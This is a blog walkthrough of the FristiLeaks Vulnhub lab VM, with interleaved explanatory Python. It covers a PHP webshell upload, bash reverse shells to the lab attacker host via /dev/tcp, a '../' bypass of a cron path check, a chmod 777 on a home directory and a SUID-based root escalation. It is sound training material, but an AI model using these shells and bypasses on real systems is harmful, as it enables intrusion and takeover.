Yoga7xm's Blog

Vulnhub: FristiLeaks

2019/01/23

0x01 Target address

https://www.vulnhub.com/entry/fristileaks-13,133/

0x02 Environment setup

Import the downloaded OVA into VirtualBox and change the MAC address to 08:00:27:A5:A6:76.

  • Target: 192.168.1.174
  • Kali: 192.168.1.139
  • Win10: 192.168.1.161

0x03 Play

1. Information gathering

➜  ~ nmap -sS -p- -T4 -v -A 192.168.1.174
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Initiating ARP Ping Scan at 19:53
Scanning 192.168.1.174 [1 port]
Completed ARP Ping Scan at 19:53, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:53
Completed Parallel DNS resolution of 1 host. at 19:53, 0.01s elapsed
Initiating SYN Stealth Scan at 19:53
Scanning 192.168.1.174 [65535 ports]
Discovered open port 80/tcp on 192.168.1.174
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

Only port 80 (a web service) is open, so port 80 is the only way in.

2. Directory scanning

➜  ~ dirb http://192.168.1.174 -r

-----------------
DIRB v2.22
By The Dark Raver
-----------------

URL_BASE: http://192.168.1.174/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.174/ ----
+ http://192.168.1.174/cgi-bin/ (CODE:403|SIZE:210)
==> DIRECTORY: http://192.168.1.174/images/
+ http://192.168.1.174/index.html (CODE:200|SIZE:703)
+ http://192.168.1.174/robots.txt (CODE:200|SIZE:62)

A robots.txt was found.

➜  ~ curl http://192.168.1.174/robots.txt
User-agent: *
Disallow: /cola
Disallow: /sisi
Disallow: /beer

Three directories were found, but each of them only serves a single image.

3.Getshell

Nothing useful there. Back to the main page, then, and let's try fristi.

There is a login form. A few weak passwords were tried, all without success. Looking at the page source reveals two comments:

<!-- 
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
-->

That gives us the username eezeepz. Using Submit, the data is joined into a single line and then decoded.

It is a PNG image. Save it as a .png file and open it.

This should be the password: keKkeKKeKKeKkEkkEk. Log in to the system with it, and we are in.
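The step above (join a base64 blob that was wrapped across lines in an HTML comment, decode it, and recognise the result as a PNG) is easy to get wrong by hand. The following is an added example, not code from the original post: it normalises the pasted text, decodes it and identifies the file by its magic bytes. The sample blob is constructed (it is just the 8-byte PNG signature, base64-encoded and split over two lines); the JPEG and GIF signatures are added so the sniffer generalises a little beyond the PNG case on this box.

```python
import base64
import re

# Magic bytes recognised by the sniffer. PNG is the case from the box; JPEG and
# GIF are added for generality.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def normalize_base64(text: str) -> str:
    """Join a base64 blob that was wrapped over many lines into one line,
    dropping anything that is not part of the base64 alphabet."""
    return re.sub(r"[^A-Za-z0-9+/=]", "", text)


def sniff(data: bytes) -> str:
    """Return the file type implied by the leading magic bytes, or 'unknown'."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def decode_and_identify(text: str):
    """Decode a (possibly multi-line) base64 blob and report what it contains."""
    data = base64.b64decode(normalize_base64(text), validate=True)
    return sniff(data), data


# Constructed sample: the PNG signature, base64-encoded and wrapped across
# lines the way a pasted HTML comment would be.
SAMPLE = "iVBORw0K\nGgo=\n"

if __name__ == "__main__":
    kind, data = decode_and_identify(SAMPLE)
    print(f"detected {kind}, {len(data)} bytes")
    if kind != "unknown":
        # Write it out with the right extension so an image viewer opens it.
        with open(f"decoded.{kind}", "wb") as fh:
            fh.write(data)
```

`validate=True` makes `b64decode` reject any stray characters that survived normalisation instead of silently skipping them, which is what you want when a decode "succeeds" but produces garbage.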

There is only one function, uploadfile, so upload a one-line PHP webshell.

Then visiting http://192.168.1.174/fristi/uploads/eval.php.jpg actually executes it.

Connect with Caidao (China Chopper) and get a reverse shell:

bash -i >& /dev/tcp/192.168.1.139/1234 0>&1

While browsing the files, a hint was found in /home/eezeepz/notes.txt, and there is also a user named fristigod.

It says that the file /tmp/runthis is executed periodically as admin, but the command path is restricted; otherwise it fails with:

command did not start with /home/admin or /usr/bin

So ../ is used here to bypass the check:

/usr/bin/../../bin/bash -i >& /dev/tcp/192.168.1.139/12345 0>&1
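The bypass works because the cron job only compares the raw command string against an allowed prefix, and "/usr/bin/../../bin/bash" does start with "/usr/bin". The following is an added example, not code from the box or the original post: `weak_check` reproduces the prefix test implied by the error message, and `hardened_check` is a hypothetical replacement that validates only the executable, normalises away ".." segments, and requires it to sit inside an allowed directory as a whole path component. The allowed directories come from the error message quoted above; the function names and the command lines in the test are constructed.

```python
import os
import shlex

# Directories the cron job's check is meant to confine commands to, taken from
# the error message: "command did not start with /home/admin or /usr/bin".
ALLOWED_DIRS = ("/home/admin", "/usr/bin")


def weak_check(command: str) -> bool:
    """The naive test implied by the error message: a plain string prefix
    comparison on the whole command line. '..' components defeat it, and so
    does a sibling directory such as /usr/binx."""
    return command.startswith(ALLOWED_DIRS)


def hardened_check(command: str) -> bool:
    """Hypothetical replacement for the check above.

    Only the executable (first word) is validated, it must be absolute, '.'
    and '..' segments are collapsed first, and the result must lie under an
    allowed directory as a complete path component.
    """
    parts = shlex.split(command)
    if not parts:
        return False
    executable = parts[0]
    if not os.path.isabs(executable):
        return False
    normalized = os.path.normpath(executable)
    # On a live system also apply os.path.realpath() here so that a symlink
    # inside /usr/bin pointing elsewhere is resolved before the comparison.
    return any(os.path.commonpath([normalized, d]) == d for d in ALLOWED_DIRS)


if __name__ == "__main__":
    # Constructed command lines: one legitimate, one using the '..' trick, one
    # using a look-alike directory name.
    for cmd in ("/usr/bin/id", "/usr/bin/../../bin/bash -i", "/usr/binx/evil"):
        print(f"{cmd!r}: weak={weak_check(cmd)} hardened={hardened_check(cmd)}")
```

`os.path.commonpath` is what turns "is under this directory" into a component-wise comparison: for "/usr/binx/evil" and "/usr/bin" it returns "/usr", so the look-alike directory is rejected even though a `startswith` test would accept it.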

After a short wait, a shell comes back.

4. Privilege escalation

To make file transfer through Caidao easier, the /home/admin directory is set to 777 here:

/usr/bin/../../bin/chmod -R 777 /home/admin

This yields an encryption script and two ciphertexts:

#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
# Python 2 script as found on the box: base64-encode, reverse, then rot13.
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

#whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG

#cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq

The encryption is not complicated, so write a decoder:

# Python 2: str.encode('rot13') and the print statement do not exist in Python 3.
import base64,sys

def decode(str):
    # Undo the reversal, then rot13 (which is its own inverse), then base64-decode.
    str = str[::-1].encode('rot13')
    return base64.b64decode(str)

print decode(sys.argv[1])
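The decoder above relies on Python 2 (`str.encode('rot13')` is gone in Python 3). As an added example that is not part of the original post, here is a Python 3 port of both directions of the transform used by the script found on the box, applied to the two ciphertexts exactly as they appear in whoisyourgodnow.txt and cryptedpass.txt. The `main` block also round-trips each plaintext through the encoder to confirm the port matches the original scheme; whoisyourgodnow.txt decodes to the fristigod password that is used later in the write-up.

```python
import base64
import codecs


def encode_string(plain: str) -> str:
    """Same transform as the script on the box: base64, reverse, rot13."""
    b64 = base64.b64encode(plain.encode()).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")


def decode_string(cipher: str) -> str:
    """Inverse transform: undo rot13 (self-inverse), un-reverse, base64-decode.
    rot13 acts per character, so it commutes with the reversal."""
    b64 = codecs.decode(cipher[::-1], "rot13")
    return base64.b64decode(b64).decode()


# Ciphertexts exactly as found in the two files on the box.
WHOISYOURGODNOW = "=RFn0AKnlMHMPIzpyuTI0ITG"
CRYPTEDPASS = "mVGZ3O3omkJLmy2pcuTq"

if __name__ == "__main__":
    for name, cipher in (("whoisyourgodnow.txt", WHOISYOURGODNOW),
                         ("cryptedpass.txt", CRYPTEDPASS)):
        plain = decode_string(cipher)
        # Round-trip check: re-encoding must reproduce the original ciphertext.
        assert encode_string(plain) == cipher
        print(f"{name}: {plain}")
```

Note that the leading "=" in the first ciphertext is just base64 padding that ended up at the front after the reversal; rot13 leaves it untouched, so the reversed string is valid base64 again.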

These two are probably passwords. First, look for files owned by fristigod:

find / -user fristigod 2>/dev/null

Try switching to fristigod:

bash-4.1$ python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import pty; pty.spawn("/bin/sh")'
sh-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!
bash-4.1$ whoami
whoami
fristigod
bash-4.1$ cd /var/fristigod
cd /var/fristigod
bash-4.1$ ls -al
ls -al
total 16
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 .
drwxr-xr-x. 19 root root 4096 Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .secret_admin_stuff

There is a .bash_history, so let's look at the command history:

ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

It looks like privilege escalation goes through a SUID binary, so search for them with find:

bash-4.1$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/mount
/bin/fusermount
/bin/umount
/bin/su
/bin/ping
/bin/ping6
/sbin/pam_timestamp_check
/sbin/unix_chkpwd
/usr/bin/crontab
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/passwd
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/usr/sbin/suexec
/usr/sbin/usernetctl
/var/fristigod/.secret_admin_stuff/doCom

The /var/fristigod/.secret_admin_stuff/doCom file shows up right here, so use it directly to escalate privileges:

bash-4.1$ sudo -u fristi ./doCom /bin/bash
sudo -u fristi ./doCom /bin/bash
bash-4.1# whoami
whoami
root
bash-4.1# ls /root/
ls /root/
fristileaks_secrets.txt
bash-4.1# cat /root/fristileaks_secrets.txt
cat /root/fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)


Flag: Y0u_kn0w_y0u_l0ve_fr1st1

Shell obtained successfully.
